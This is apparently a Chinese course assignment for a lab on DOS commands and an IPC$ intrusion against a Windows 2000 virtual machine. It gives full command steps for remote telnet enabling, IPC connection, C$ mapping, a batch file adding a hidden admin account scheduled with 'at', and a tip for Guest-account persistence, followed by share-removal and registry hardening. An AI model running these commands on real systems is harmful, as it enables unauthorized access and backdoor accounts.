第二次作业DOS命令与IPC入侵防范.docVIP

第二次作业 常用DOS命令（把下列命令运行的结果截图） Ping Ipconfig Dir Md Echo Type Net user net localgroup At Net stat arp DOS命令综合运用之利用IPC漏洞入侵提权（开启windows 2000与XP虚拟机） 利用XP作为客户机，windows 2000作为服务器，在XP中操作入侵wind2000，步骤： 开启wind2000 telnet服务可以用OpenTelnet.exe工具，将OpenTelnet.exe拷贝到C盘根目录下并执行OpenTelnet.exe \\192.168.2.2 administrator 123456 1 90 如下图 给wind2000超级管理员administraror设置密码为123456，如下图 利用net use * /del清空所有的IPC连接，如下图 利用net use \\192.168.2.2\ipc$ 123456 /user:administrator建立一个超级IPC连接，如下图 利用net use z:\\192.168.2.2\c$ 把windows2000 C盘变成本地磁盘（XP中）的Z盘，打开XP里我的电脑 如下图 利用(echo net user hack 123456 /add hack.bat和(echo net localgroup administrators hack /add hack.bat二条指令建立一个名为hack.bat的后门账号，并利用type查看命令是否正确， 如下图 利用copy hack.bat \\192.168.2.2\c$,把hack.bat拷贝到windows2000的C盘， 如下图 利用net time \\192.168.2.2查看windows2000系统当前时间，如下图 假设当前时间为8:45分，则可以利用 at\ \192.168.2.2 8:46 c:\hack.bat ，来执行hack.bat建立后门账号，如下图： 利用net use */del删除IPC连接，如下图 等一小段时间后估计windos2000以执行hack.bat，则通过telnet 192.168.2.2去登陆，并利用账号hack ，密码123456验证，若能登陆说明入侵成功。如下图 小策略：为了隐蔽可以利用guest账号，net user guest /active:yes将Guest用户激活， net user guest 1234 将Guest的密码改为1234, net localgroup administrators guest /add 将Guest变为Administrator超级管理员，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了。 IPC漏了防范： (1) 运行命令提示符(cmd.exe)，在命令提示符下输入如下命令： net share 查看默认共享，如下图 (2) 在命令提示符下输入如下命令： net share ipc$ /delete 删除ipc$共享。如下图 逐步使用net share命令，删除c$、d$、e$、f$和admin$共享。如下图 (4) 接着在命令提示符下输入如下命令： net stop server /y 停止Server服务，该服务提供 RPC 支持、文件、打印以及命名管道共享，如下图 (5) 运行注册表编辑器，找到如下键值： HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters 修改注册表键值【AutoShareWks】的Dword值 修改注册表键值【AutoShareServer】的Dword值如下图